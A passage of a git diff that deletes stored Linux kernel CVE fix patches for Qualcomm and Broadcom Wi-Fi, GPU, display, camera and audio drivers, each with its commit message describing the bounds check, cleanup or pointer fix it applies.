-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_LOST_SSID_SAMPLE_SIZE] = { .type = NLA_U32 },
-@@ -858,6 +853,23 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- };
- 
- static const struct nla_policy
-+wlan_hdd_pno_config_policy[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1] = {
-+	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = {
-+		.type = NLA_U32
-+	},
-+	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = {
-+		.type = NLA_BINARY,
-+		.len = IEEE80211_MAX_SSID_LEN + 1
-+	},
-+	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = {
-+		.type = NLA_U8
-+	},
-+	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = {
-+		.type = NLA_U8
-+	},
-+};
-+
-+static const struct nla_policy
- wlan_hdd_extscan_results_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_MAX + 1] =
- {
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_RESULTS_SCAN_RESULT_BEACON_PERIOD] = { .type = NLA_U16 },
-@@ -4672,19 +4684,18 @@ static int hdd_extscan_epno_fill_network_list(
- 			struct wifi_epno_params *req_msg,
- 			struct nlattr **tb)
- {
--	struct nlattr *network[
--		QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX + 1];
-+	struct nlattr *network[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1];
- 	struct nlattr *networks;
- 	int rem1, ssid_len;
- 	uint8_t index, *ssid;
- 
- 	index = 0;
- 	nla_for_each_nested(networks,
--		tb[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST],
--		rem1) {
--		if (nla_parse(network,
--			QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
--			nla_data(networks), nla_len(networks), NULL)) {
-+			    tb[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST],
-+			    rem1) {
-+		if (nla_parse(network, QCA_WLAN_VENDOR_ATTR_PNO_MAX,
-+			      nla_data(networks), nla_len(networks),
-+			      wlan_hdd_pno_config_policy)) {
- 			hddLog(LOGE, FL("nla_parse failed"));
- 			return -EINVAL;
- 		}
-@@ -4697,6 +4708,12 @@ static int hdd_extscan_epno_fill_network_list(
- 		ssid_len = nla_len(
- 			network[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID]);
- 
-+		/* nla_parse will detect overflow but not underflow */
-+		if (0 == ssid_len) {
-+			hddLog(LOGE, FL("zero ssid length"));
-+			return -EINVAL;
-+		}
-+
- 		/* Decrement by 1, don't count null character */
- 		ssid_len--;
- 
-@@ -4771,8 +4788,8 @@ static int __wlan_hdd_cfg80211_set_epno_list(struct wiphy *wiphy,
- 	}
- 
- 	if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_PNO_MAX,
--		data, data_len,
--		wlan_hdd_extscan_config_policy)) {
-+		      data, data_len,
-+		      wlan_hdd_pno_config_policy)) {
- 		hddLog(LOGE, FL("Invalid ATTR"));
- 		return -EINVAL;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8420/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8420/qcacld-2.0/0001.patch
deleted file mode 100644
index 1a0b35c6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8420/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From c6597e015a7ce5ee71d3725fc55e64fc50923f4e Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Wed, 9 Nov 2016 10:23:02 -0800
-Subject: qcacld-2.0: Avoid overflow of EPNO network list
-
-Currently when processing an EPNO vendor command the "num networks"
-attribute is limit checked and if it exceeds a MAX value then it is
-reset to that MAX value. This value is then used to calculate the size
-of the buffer allocated to hold the internal representation of the
-request. However later when the network attributes are parsed there is
-no check to make sure the number of networks processed does not exceed
-the (possibly modified) "num networks" used to allocate memory, and as
-a result a buffer overflow can occur. Address this issue by aborting
-the network parsing once "num networks" records have been parsed.
-
-Change-Id: I6e5f321d23471d082bb000ad0422ea9baa76577a
-CRs-Fixed: 1087807
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 92cbb67..233482d 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -4825,11 +4825,19 @@ static int hdd_extscan_epno_fill_network_list(
- 	struct nlattr *networks;
- 	int rem1, ssid_len;
- 	uint8_t index, *ssid;
-+	uint32_t expected_networks;
- 
-+	expected_networks = req_msg->num_networks;
- 	index = 0;
- 	nla_for_each_nested(networks,
- 			    tb[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORKS_LIST],
- 			    rem1) {
-+
-+		if (index == expected_networks) {
-+			hddLog(LOGW, FL("ignoring excess networks"));
-+			break;
-+		}
-+
- 		if (nla_parse(network, QCA_WLAN_VENDOR_ATTR_PNO_MAX,
- 			      nla_data(networks), nla_len(networks),
- 			      wlan_hdd_pno_config_policy)) {
-@@ -4883,6 +4891,7 @@ static int hdd_extscan_epno_fill_network_list(
- 
- 		index++;
- 	}
-+	req_msg->num_networks = index;
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8421/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8421/qcacld-2.0/0001.patch
deleted file mode 100644
index 150a6585..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8421/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 61a5cdb9adc96645583f528ac923e6e59f3abbcb Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Wed, 9 Nov 2016 11:22:57 -0800
-Subject: qcacld-2.0: Avoid overflow of EXTSCAN bucket list
-
-Currently when processing an EXTSCAN vendor command the "num buckets"
-attribute is limit checked and if it exceeds a MAX value then a
-warning message is issued. But beyond that the "num buckets" attribute
-is not used. Instead when the buckets are actually parsed the number
-of buckets is calculated dynamically based upon the number of
-attributes present in the request. Unfortunately when the bucket
-attributes are parsed there is no check to make sure the number of
-buckets processed does not exceed the MAX value, and as a result a
-buffer overflow can occur. Address this issue by aborting the bucket
-parsing once the expected number of records have been parsed.
-
-Change-Id: Ic260dd65dc99118afbb8042d102acb5b26d1e123
-CRs-Fixed: 1087797
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 13 ++++++++++++-
- 1 file changed, 12 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index f488edc..ce8043d 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -3531,6 +3531,7 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- 	int rem1, rem2;
- 	eHalStatus status;
- 	uint8_t bktIndex, j, numChannels, total_channels = 0;
-+	uint32_t expected_buckets;
- 	uint32_t chanList[WNI_CFG_VALID_CHANNEL_LIST_LEN] = {0};
- 
- 	uint32_t min_dwell_time_active_bucket =
-@@ -3542,7 +3543,6 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- 	uint32_t max_dwell_time_passive_bucket =
- 		pHddCtx->cfg_ini->extscan_passive_max_chn_time;
- 
--	bktIndex = 0;
- 	pReqMsg->min_dwell_time_active =
- 		pReqMsg->max_dwell_time_active =
- 			pHddCtx->cfg_ini->extscan_active_max_chn_time;
-@@ -3550,10 +3550,19 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- 	pReqMsg->min_dwell_time_passive =
- 		pReqMsg->max_dwell_time_passive =
- 			pHddCtx->cfg_ini->extscan_passive_max_chn_time;
-+
-+	expected_buckets = pReqMsg->numBuckets;
- 	pReqMsg->numBuckets = 0;
-+	bktIndex = 0;
- 
- 	nla_for_each_nested(buckets,
- 			tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC], rem1) {
-+
-+		if (bktIndex >= expected_buckets) {
-+			hddLog(LOGW, FL("ignoring excess buckets"));
-+			break;
-+		}
-+
- 		if (nla_parse(bucket,
- 			QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
- 			nla_data(buckets), nla_len(buckets), NULL)) {
-@@ -4055,8 +4064,10 @@ static int __wlan_hdd_cfg80211_extscan_start(struct wiphy *wiphy,
- 		hddLog(LOGW,
- 			FL("Exceeded MAX number of buckets: %d"),
- 			WLAN_EXTSCAN_MAX_BUCKETS);
-+		num_buckets = WLAN_EXTSCAN_MAX_BUCKETS;
- 	}
- 	hddLog(LOG1, FL("Input: Number of Buckets %d"), num_buckets);
-+	pReqMsg->numBuckets = num_buckets;
- 
- 	/* This is optional attribute, if not present set it to 0 */
- 	if (!tb[PARAM_CONFIG_FLAGS])
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8434/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8434/ANY/0001.patch
deleted file mode 100644
index afc04c26..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8434/ANY/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 3e3866a5fced40ccf9ca442675cf915961efe4d9 Mon Sep 17 00:00:00 2001
-From: Jeremy Gebben <jgebben@codeaurora.org>
-Date: Fri, 27 Feb 2015 11:32:29 -0700
-Subject: msm: kgsl: fix sync file error handling
-
-We need to call put_unused_fd() on failure, but only if
-a file hasn't been stored into the fd yet. This function
-wasn't called from kgsl_ioctl_syncsource_create_fence()
-and was called incorrectly from kgsl_add_fence_event().
-Reorder our sync_fence_install() calls to happen after
-all possible failures so that error cleanup will be
-correct.
-
-Change-Id: I0e7bb459f2acc010446ac5e5b3b72c8b16cce079
-Signed-off-by: Jeremy Gebben <jgebben@codeaurora.org>
----
- drivers/gpu/msm/kgsl_sync.c | 10 +++++++---
- 1 file changed, 7 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl_sync.c b/drivers/gpu/msm/kgsl_sync.c
-index 4695b33..9e9e058 100644
---- a/drivers/gpu/msm/kgsl_sync.c
-+++ b/drivers/gpu/msm/kgsl_sync.c
-@@ -203,7 +203,6 @@ int kgsl_add_fence_event(struct kgsl_device *device,
- 		ret = priv.fence_fd;
- 		goto out;
- 	}
--	sync_fence_install(fence, priv.fence_fd);
- 
- 	/*
- 	 * If the timestamp hasn't expired yet create an event to trigger it.
-@@ -222,9 +221,11 @@ int kgsl_add_fence_event(struct kgsl_device *device,
- 			goto out;
- 	}
- 
--	if (copy_to_user(data, &priv, sizeof(priv)))
-+	if (copy_to_user(data, &priv, sizeof(priv))) {
- 		ret = -EFAULT;
--
-+		goto out;
-+	}
-+	sync_fence_install(fence, priv.fence_fd);
- out:
- 	kgsl_context_put(context);
- 	if (ret) {
-@@ -599,6 +600,9 @@ out:
- 	if (ret) {
- 		if (fence)
- 			sync_fence_put(fence);
-+		if (fd >= 0)
-+			put_unused_fd(fd);
-+
- 	}
- 	kgsl_syncsource_put(syncsource);
- 	return ret;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8436/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8436/ANY/0001.patch
deleted file mode 100644
index 9d934680..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8436/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 228e8d17b9f5d22cf9896ab8eff88dc6737c2ced Mon Sep 17 00:00:00 2001
-From: Shalini Krishnamoorthi <shakri@codeaurora.org>
-Date: Thu, 12 May 2016 12:13:23 -0700
-Subject: msm: mdss: Fix NULL pointer dereference
-
-A wrong pointer was freed and dereferenced
-leading to fatal exception. Fixed this by
-correcting the pointer variable.
-
-Change-Id: Ic3d55d88c61ab215139de7fe0c53b8bb89bf85f8
-Signed-off-by: Shalini Krishnamoorthi <shakri@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_dsi.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index 4df7e98..403444f 100644
---- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -2802,7 +2802,7 @@ static int mdss_dsi_ctrl_clock_init(struct platform_device *ctrl_pdev,
- error_clk_client_deregister:
- 	mdss_dsi_clk_deregister(ctrl_pdata->dsi_clk_handle);
- error_clk_deinit:
--	mdss_dsi_clk_deinit(ctrl_pdata);
-+	mdss_dsi_clk_deinit(ctrl_pdata->clk_mngr);
- error_link_clk_deinit:
- 	mdss_dsi_link_clk_deinit(&ctrl_pdev->dev, ctrl_pdata);
- 	return rc;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8444/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8444/ANY/0001.patch
deleted file mode 100644
index 8c38bb7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8444/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 78506ab75e0cbbfbf372867cc24282d7e739f4d6 Mon Sep 17 00:00:00 2001
-From: Ranjith Kagathi Ananda <ranjith@codeaurora.org>
-Date: Fri, 4 Sep 2015 16:48:10 -0700
-Subject: [PATCH] msm: ispif: Remove handling of SD_SHUTDOWN
-
-Remove handling of SD_SHUTDOWN to avoid multiple release.
-
-Bug: 31243641
-
-Change-Id: I09db8adb766d2e7889443f779a716aaa2f6c09d1
-Signed-off-by: Harsh Shah <harshs@codeaurora.org>
-Signed-off-by: Ranjith Kagathi Ananda <ranjith@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 5115e3853fe1c..fb1f93cd4c0bc 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -1325,10 +1325,6 @@ static long msm_ispif_subdev_ioctl(struct v4l2_subdev *sd,
- 	case VIDIOC_MSM_ISPIF_CFG:
- 		return msm_ispif_cmd(sd, arg);
- 	case MSM_SD_SHUTDOWN: {
--		struct ispif_device *ispif =
--			(struct ispif_device *)v4l2_get_subdevdata(sd);
--		if (ispif && ispif->base)
--			msm_ispif_release(ispif);
- 		return 0;
- 	}
- 	default:
diff --git a/Patches/Linux_CVEs/CVE-2016-8450/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8450/ANY/0001.patch
deleted file mode 100644
index ef1f72fd..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8450/ANY/0001.patch
+++ /dev/null
@@ -1,86 +0,0 @@
-From e909d159ad1998ada853ed35be27c7b6ba241bdb Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Wed, 27 Jul 2016 15:07:53 +0800
-Subject: ASoC: msm: set pointers to NULL after kfree
-
-In lsm-related driver files, some pointers are not set as NULL
-after the memory is freed, which will leave many dangling pointers.
-Set them to NULL explicitly to avoid potential risk.
-
-CRs-Fixed: 880388
-Change-Id: I44925240705608510266a51225cc02611637c571
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- sound/soc/msm/msm-cpe-lsm.c          | 7 +++++++
- sound/soc/msm/qdsp6v2/msm-dai-slim.c | 2 ++
- sound/soc/msm/qdsp6v2/q6lsm.c        | 1 +
- 3 files changed, 10 insertions(+)
-
-diff --git a/sound/soc/msm/msm-cpe-lsm.c b/sound/soc/msm/msm-cpe-lsm.c
-index 9f957e5..a529fcc 100644
---- a/sound/soc/msm/msm-cpe-lsm.c
-+++ b/sound/soc/msm/msm-cpe-lsm.c
-@@ -1219,6 +1219,7 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 			dev_err(rtd->dev, "%s: No memory for sound model\n",
- 				__func__);
- 			kfree(session->conf_levels);
-+			session->conf_levels = NULL;
- 			return -ENOMEM;
- 		}
- 		session->snd_model_size = snd_model.data_size;
-@@ -1230,6 +1231,8 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 				__func__);
- 			kfree(session->conf_levels);
- 			kfree(session->snd_model_data);
-+			session->conf_levels = NULL;
-+			session->snd_model_data = NULL;
- 			return -EFAULT;
- 		}
- 
-@@ -1241,6 +1244,8 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 			       __func__, rc);
- 			kfree(session->snd_model_data);
- 			kfree(session->conf_levels);
-+			session->snd_model_data = NULL;
-+			session->conf_levels = NULL;
- 			return rc;
- 		}
- 
-@@ -1254,6 +1259,8 @@ static int msm_cpe_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 			lsm_ops->lsm_shmem_dealloc(cpe->core_handle, session);
- 			kfree(session->snd_model_data);
- 			kfree(session->conf_levels);
-+			session->snd_model_data = NULL;
-+			session->conf_levels = NULL;
- 			return rc;
- 		}
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-dai-slim.c b/sound/soc/msm/qdsp6v2/msm-dai-slim.c
-index b46d0a5..4bb8f59 100644
---- a/sound/soc/msm/qdsp6v2/msm-dai-slim.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dai-slim.c
-@@ -482,7 +482,9 @@ static void msm_dai_slim_remove_dai_data(
- 		dai_data_t = &drv_data->slim_dai_data[i];
- 
- 		kfree(dai_data_t->chan_h);
-+		dai_data_t->chan_h = NULL;
- 		kfree(dai_data_t->sh_ch);
-+		dai_data_t->sh_ch = NULL;
- 	}
- }
- 
-diff --git a/sound/soc/msm/qdsp6v2/q6lsm.c b/sound/soc/msm/qdsp6v2/q6lsm.c
-index ec73472..2bf0c49 100644
---- a/sound/soc/msm/qdsp6v2/q6lsm.c
-+++ b/sound/soc/msm/qdsp6v2/q6lsm.c
-@@ -348,6 +348,7 @@ void q6lsm_client_free(struct lsm_client *client)
- 	q6lsm_mmap_apr_dereg();
- 	mutex_destroy(&client->cmd_lock);
- 	kfree(client);
-+	client = NULL;
- }
- 
- /*
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8452/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8452/qcacld-2.0/0001.patch
deleted file mode 100644
index d1d433b6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8452/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From 39fa8e972fa1b10dc68a066f4f9432753d8a2526 Mon Sep 17 00:00:00 2001
-From: kaliu <kaliu@qti.qualcomm.com>
-Date: Thu, 4 Aug 2016 14:08:13 +0800
-Subject: qcacld-2.0: Use heap memory for station_info instead of stack
-
-From kernel 3.19-rc4, size of struct station_info is around 600 bytes,
-so stack frame size of such routine use this struct will easily
-exceed 1024 bytes, the default value of stack frame size.
-
-So use heap memory for this struct instead.
-
-Change-Id: Ibe8a4f5189fcc9d5554f7a5d851c93be8fa8dbad
-CRs-Fixed: 1050323
----
- CORE/HDD/src/wlan_hdd_assoc.c   | 19 +++++++++++++------
- CORE/HDD/src/wlan_hdd_hostapd.c | 18 ++++++++++++------
- 2 files changed, 25 insertions(+), 12 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_assoc.c b/CORE/HDD/src/wlan_hdd_assoc.c
-index 492785d..c5947c2 100644
---- a/CORE/HDD/src/wlan_hdd_assoc.c
-+++ b/CORE/HDD/src/wlan_hdd_assoc.c
-@@ -2811,7 +2811,7 @@ static eHalStatus roamRoamConnectStatusUpdateHandler( hdd_adapter_t *pAdapter, t
-       case eCSR_ROAM_RESULT_IBSS_NEW_PEER:
-       {
-          hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
--         struct station_info staInfo;
-+         struct station_info *stainfo;
- 
-          VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-                    "IBSS New Peer indication from SME with peerMac " MAC_ADDRESS_STR " BSSID: " MAC_ADDRESS_STR " and stationID= %d",
-@@ -2846,13 +2846,20 @@ static eHalStatus roamRoamConnectStatusUpdateHandler( hdd_adapter_t *pAdapter, t
-                vosStatus, vosStatus );
-          }
-          pHddStaCtx->ibss_sta_generation++;
--         memset(&staInfo, 0, sizeof(staInfo));
--         staInfo.filled = 0;
--         staInfo.generation = pHddStaCtx->ibss_sta_generation;
-+         stainfo = vos_mem_malloc(sizeof(*stainfo));
-+         if (stainfo == NULL) {
-+             VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                       "memory allocation for station_info failed");
-+             return eHAL_STATUS_FAILED_ALLOC;
-+         }
-+         memset(stainfo, 0, sizeof(*stainfo));
-+         stainfo->filled = 0;
-+         stainfo->generation = pHddStaCtx->ibss_sta_generation;
- 
-          cfg80211_new_sta(pAdapter->dev,
--                      (const u8 *)pRoamInfo->peerMac,
--                      &staInfo, GFP_KERNEL);
-+                          (const u8 *)pRoamInfo->peerMac,
-+                          stainfo, GFP_KERNEL);
-+         vos_mem_free(stainfo);
- 
-          if ( eCSR_ENCRYPT_TYPE_WEP40_STATICKEY == pHddStaCtx->ibss_enc_key.encType
-             ||eCSR_ENCRYPT_TYPE_WEP104_STATICKEY == pHddStaCtx->ibss_enc_key.encType
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index ba37ddc..1b7c1c7 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -1836,15 +1836,20 @@ VOS_STATUS hdd_hostapd_SAPEventCB( tpSap_Event pSapEvent, v_PVOID_t usrDataForCa
-                                           HDD_SAP_WAKE_LOCK_DURATION,
-                                           WIFI_POWER_EVENT_WAKELOCK_SAP);
-             {
--               struct station_info staInfo;
-                v_U16_t iesLen =  pSapEvent->sapevt.sapStationAssocReassocCompleteEvent.iesLen;
- 
--               memset(&staInfo, 0, sizeof(staInfo));
-                if (iesLen <= MAX_ASSOC_IND_IE_LEN )
-                {
--                  staInfo.assoc_req_ies =
-+                  struct station_info *stainfo;
-+                  stainfo = vos_mem_malloc(sizeof(*stainfo));
-+                  if (stainfo == NULL) {
-+                      hddLog(LOGE, FL("alloc station_info failed"));
-+                      return VOS_STATUS_E_NOMEM;
-+                  }
-+                  memset(stainfo, 0, sizeof(*stainfo));
-+                  stainfo->assoc_req_ies =
-                      (const u8 *)&pSapEvent->sapevt.sapStationAssocReassocCompleteEvent.ies[0];
--                  staInfo.assoc_req_ies_len = iesLen;
-+                  stainfo->assoc_req_ies_len = iesLen;
- #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 0, 0))
-                   /*
-                    * After Kernel 4.0, it's no longer need to set
-@@ -1853,12 +1858,13 @@ VOS_STATUS hdd_hostapd_SAPEventCB( tpSap_Event pSapEvent, v_PVOID_t usrDataForCa
-                    * check the existance of request IE.
-                    */
- #if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,0,31)) || defined(WITH_BACKPORTS)
--                  staInfo.filled |= STATION_INFO_ASSOC_REQ_IES;
-+                  stainfo->filled |= STATION_INFO_ASSOC_REQ_IES;
- #endif
- #endif
-                   cfg80211_new_sta(dev,
-                         (const u8 *)&pSapEvent->sapevt.sapStationAssocReassocCompleteEvent.staMac.bytes[0],
--                        &staInfo, GFP_KERNEL);
-+                        stainfo, GFP_KERNEL);
-+                  vos_mem_free(stainfo);
-                }
-                else
-                {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8453/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8453/ANY/0001.patch
deleted file mode 100644
index ac740441..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8453/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From f10f4e420dddc35dfef53965c55ffd5bdec41a45 Mon Sep 17 00:00:00 2001
-From: Insun Song <isong@broadcom.com>
-Date: Mon, 12 Oct 2015 23:31:12 -0700
-Subject: [PATCH] net: wireless: bcmdhd: remove unnecessary PCIe memory access
- when BUS down.
-
-In case PCIe BUS already down, we're not supposed to do access BAR0
-area in any reason. One instance seen on test that made kernel panic.
-removed disable irq calling which is useless in bus down case.
-
-bug=24739315
-
-Change-Id: I474e08c14c4dec0f4cc4cd207f29fef32e85ead7
-Signed-off-by: Insun Song <isong@broadcom.com>
----
- drivers/net/wireless/bcmdhd/dhd_pcie.c | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pcie.c b/drivers/net/wireless/bcmdhd/dhd_pcie.c
-index 21bbe54ee1889..1adffc366c679 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pcie.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pcie.c
-@@ -2472,7 +2472,6 @@ dhd_bus_devreset(dhd_pub_t *dhdp, uint8 flag)
- 				bus->dhd->busstate = DHD_BUS_DOWN;
- 			} else {
- 				if (bus->intr) {
--					dhdpcie_bus_intr_disable(bus);
- 					dhdpcie_free_irq(bus);
- 				}
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-8454/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8454/ANY/0001.patch
deleted file mode 100644
index 4c7d61df..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8454/ANY/0001.patch
+++ /dev/null
@@ -1,264 +0,0 @@
-From 39bd1fc23040a441628884588b19bc4d199b59c2 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Tue, 8 Nov 2016 11:19:43 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix overrun in dhd_pno_set_cfg_gscan
-
-1. added limit check for GSCAN-PNO max channel bucket
-2. added length check in each NL TLV parsing and error handling
-
-Bug: 32174590
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: Ic946bfa3b3ab6b2b201043371c27ee7dbedb7e75
----
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 210 +++++++++++++++++++----------
- 1 file changed, 142 insertions(+), 68 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 3239bf53a5f1d..b536de31010a9 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -510,23 +510,113 @@ static int wl_cfgvendor_enable_full_scan_result(struct wiphy *wiphy,
- 	return err;
- }
- 
--static int wl_cfgvendor_set_scan_cfg(struct wiphy *wiphy,
--	struct wireless_dev *wdev, const void  *data, int len)
-+static int
-+wl_cfgvendor_set_scan_cfg_bucket(const struct nlattr *prev,
-+				 gscan_scan_params_t *scan_param, int num)
-+{
-+	struct dhd_pno_gscan_channel_bucket  *ch_bucket;
-+	int k = 0;
-+	int type, err = 0, rem;
-+	const struct nlattr *cur, *next;
-+
-+	nla_for_each_nested(cur, prev, rem) {
-+		type = nla_type(cur);
-+		ch_bucket = scan_param->channel_bucket;
-+		switch (type) {
-+		case GSCAN_ATTRIBUTE_BUCKET_ID:
-+			break;
-+		case GSCAN_ATTRIBUTE_BUCKET_PERIOD:
-+			if (nla_len(cur) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+
-+			ch_bucket[num].bucket_freq_multiple =
-+				nla_get_u32(cur) / MSEC_PER_SEC;
-+			break;
-+		case GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS:
-+			if (nla_len(cur) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			ch_bucket[num].num_channels = nla_get_u32(cur);
-+			if (ch_bucket[num].num_channels >
-+				GSCAN_MAX_CHANNELS_IN_BUCKET) {
-+				WL_ERR(("channel range:%d,bucket:%d\n",
-+					ch_bucket[num].num_channels,
-+					num));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			break;
-+		case GSCAN_ATTRIBUTE_BUCKET_CHANNELS:
-+			nla_for_each_nested(next, cur, rem) {
-+				if (k >= GSCAN_MAX_CHANNELS_IN_BUCKET)
-+					break;
-+				if (nla_len(next) != sizeof(uint32)) {
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+				ch_bucket[num].chan_list[k] = nla_get_u32(next);
-+				k++;
-+			}
-+			break;
-+		case GSCAN_ATTRIBUTE_BUCKETS_BAND:
-+			if (nla_len(cur) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			ch_bucket[num].band = (uint16)nla_get_u32(cur);
-+			break;
